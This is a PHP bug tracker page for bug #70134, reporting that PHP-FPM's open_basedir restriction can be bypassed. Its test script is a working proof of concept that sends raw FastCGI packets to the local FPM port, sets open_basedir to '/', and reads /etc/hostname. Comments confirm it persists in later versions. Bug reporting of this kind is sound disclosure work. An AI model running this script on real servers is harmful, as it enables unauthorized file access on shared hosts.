php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #70134 open_basedir bypass with IP-based PHP-FPM
Submitted: 2015-07-24 20:41 UTC Modified: 2021-07-12 15:41 UTC
Votes:3
Avg. Score:4.3 ± 0.9
Reproduced:1 of 1 (100.0%)
Same Version:0 (0.0%)
Same OS:0 (0.0%)
From: butesa at freenet dot de Assigned:
Status: Open Package: FPM related
PHP Version: 5.5.27 OS: Ubuntu
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: butesa at freenet dot de
New email:
PHP Version: OS:

 

 [2015-07-24 20:41 UTC] butesa at freenet dot de 
Description:
------------
Please change the implementation of PHP_VALUE so that open_basedir can only be tightened, but not loosened (as it is already implemented with ini_set()).

At the moment, you can bypass open_basedir by connecting to the FPM port.

Test script:
---------------
<?php
echo 'START ';
echo ini_get('open_basedir');
echo file_get_contents('/etc/hostname');
echo ' END';
echo '<br/>';

if (isset($_GET['stop'])) exit;

$params = array();
$params['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
$params['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
$params['REQUEST_METHOD'] = 'GET';
$params['QUERY_STRING'] = 'stop=true';
$params['PHP_VALUE'] = 'open_basedir=/';

$params_encoded = '';
foreach ($params as $k=>$v) {
	$params_encoded.= chr(strlen($k)).chr(strlen($v)).$k.$v;
}

$len = strlen($params_encoded);
$len_encoded = chr($len >> 8).chr($len & 255);

$fp = fsockopen('127.0.0.1',9000);
fwrite($fp, "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00");
fwrite($fp, "\x01\x04\x00\x01".$len_encoded."\x00\x00".$params_encoded);
fwrite($fp, "\x01\x04\x00\x01\x00\x00\x00\x00");
fwrite($fp, "\x01\x05\x00\x01\x00\x00\x00\x00");
sleep(2);
$result = '';
while (!feof($fp)) {
  $result .= fread($fp, 1024);
}
fclose($fp);

$matches = array();
preg_match('/START.*END/s', $result, $matches);
echo $matches[0];

Expected result:
----------------
[shortened for better readability]

START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END

Actual result:
--------------
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
START / my_hostname END


Don't be surprised, you may also encounter bug 63965. In that case, the output will look like this:

START / my_hostname END
START / my_hostname END

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-07-24 20:46 UTC] butesa at freenet dot de 
Sorry, I didn't mean to make this bug report private. There is no sensible information in it.
 [2015-09-28 23:04 UTC] stas@php.net
-Assigned To: +Assigned To: fat
 [2017-04-19 10:03 UTC] xuanhung1606 at gmail dot com 
http://tnghomes.net/
 [2017-10-24 07:45 UTC] kalle@php.net
-Status: Assigned +Status: Open -Assigned To: fat +Assigned To:
 [2018-01-19 19:40 UTC] bohu at cryp dot email 
This critical security issue is still present in PHP 7.0.
At least on Debian Stretch PHP 7.0.27-0+deb9u1.

Any plan to patch it ?
Thx !
 [2020-01-14 21:45 UTC] diego dot blanco at treitos dot com 
Additionally it seems that open_basedir is bypassed by fsocksopen when using unix sockets, so this is also exploitable with unix sockets.
 [2021-07-12 15:41 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2021-07-12 15:41 UTC] cmb@php.net 
open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.
 
PHP Copyright © 2001-2021 The PHP Group
All rights reserved. 		Last updated: Sat Oct 16 04:03:33 2021 UTC